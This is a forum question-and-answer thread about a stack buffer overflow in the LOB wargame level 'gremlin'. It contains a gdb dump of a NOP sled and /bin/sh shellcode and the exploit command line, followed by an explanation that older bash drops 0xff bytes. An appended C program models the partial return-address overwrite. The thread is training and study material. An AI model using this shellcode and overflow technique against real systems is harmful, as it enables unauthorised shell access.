   incaro
   I have a LOB question. (BASH2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3211


_____[gdb stack]_____________________________________________________________________
....
0xbffffa08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa38:     0x90909090      0x90909090      0xcd58316a      0x89c38980
(gdb)
0xbffffa48:     0x58466ac1      0x685080cd      0x68732f2f      0x69622f68
0xbffffa58:     0x50e3896e      0x99e18953      0x80cd0bb0      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x4000f9a8      0x00000002      0xbffffac4
...
(gdb) i reg ebp
ebp            0xbffffa78       -1073743240
_______________________________________________________________________________________
Question 1) ./gremlin $(python -c 'print "[NOP]"*200 + "[SHELLCODE]" + "[NOP]"*24 + "[RET]"')
As shown above, I definitely overwrote it with 260 + the [RET] address.
I don't understand why the RET address, which was overwritten fine on F.T.Z, ends up as 0X4000F9A8 on LOB, with the leading bits not overwritten.
- I searched the posts and also tried "export LANG=C", but it made no difference.

Question 2) I kept getting a Segmentation fault, so I looked it up and was told to use "bash2".
It definitely works when I use bash2. But I don't know the reason.
Just as above, the ret address looks not overwritten in gdb.... I can't see what is different... I'd like to know why something that worked fine on F.T.Z without bash2.... can only be cleared when using "bash2".


  Hit : 3651     Date : 2011/05/23 04:43



    
W.H. If you use bash2 and try the attack you will see it for yourself: all the values after 0xff go in properly.

In bash, on the other hand, every value after 0xff is ignored completely.

Judging from this, bash seems to treat 0xff as the value 0x00 (NULL), but I'm not sure whether that is accurate.

In any case, bash2 recognizes the 0xff value properly and passes in the values after it without ignoring them, which is why bash2 is used.

If you want to see for yourself what the difference is, try using dumpcode.
2011/05/23  
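
An added example, not part of the original thread or either poster's code: a small C model of the behaviour described in the reply, showing how an argument cut at 0xff followed by a strcpy()-style copy leaves a value like the 0x4000f9a8 seen in the gdb dump. The intended address bytes beyond a8 f9, the original slot value, and the function names are assumptions constructed for illustration; only the last four bytes of the argument are modelled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed sample values: only the low bytes a8 f9 and the top byte 0x40
 * are visible in the dump; everything else is assumed for illustration. */
static const uint8_t INTENDED_RET_LE[4] = { 0xa8, 0xf9, 0xff, 0xbf };
#define ORIGINAL_SLOT 0x40112233u   /* saved return address before the copy */

/* Argument as the program receives it. cut_at_ff=1 models the reply's
 * description of the old bash (0xff and everything after it is lost). */
static size_t deliver(const uint8_t *arg, size_t n, int cut_at_ff, uint8_t *out)
{
    size_t i = 0;
    while (i < n && arg[i] != 0x00 && !(cut_at_ff && arg[i] == 0xff)) {
        out[i] = arg[i];
        i++;
    }
    out[i] = 0x00;   /* argv strings always end in NUL */
    return i;
}

/* strcpy() onto a little-endian 4-byte slot: the string bytes and the
 * terminating NUL are written, bytes beyond that keep their old value. */
static uint32_t slot_after_copy(uint32_t original, const uint8_t *s, size_t len)
{
    uint8_t slot[4];
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) slot[i] = (uint8_t)(original >> (8 * i));
    for (size_t i = 0; i <= len && i < 4; i++) slot[i] = s[i];
    for (int i = 3; i >= 0; i--) v = (v << 8) | slot[i];
    return v;
}

/* End-to-end: what the 4-byte slot holds after the argument tail is copied. */
uint32_t slot_via_shell(int cut_at_ff)
{
    uint8_t argv_tail[5];
    size_t len = deliver(INTENDED_RET_LE, 4, cut_at_ff, argv_tail);
    return slot_after_copy(ORIGINAL_SLOT, argv_tail, len);
}

int main(void)
{
    printf("old bash model: 0x%08x\n", (unsigned)slot_via_shell(1));
    printf("bash2 model:    0x%08x\n", (unsigned)slot_via_shell(0));
    return 0;
}
```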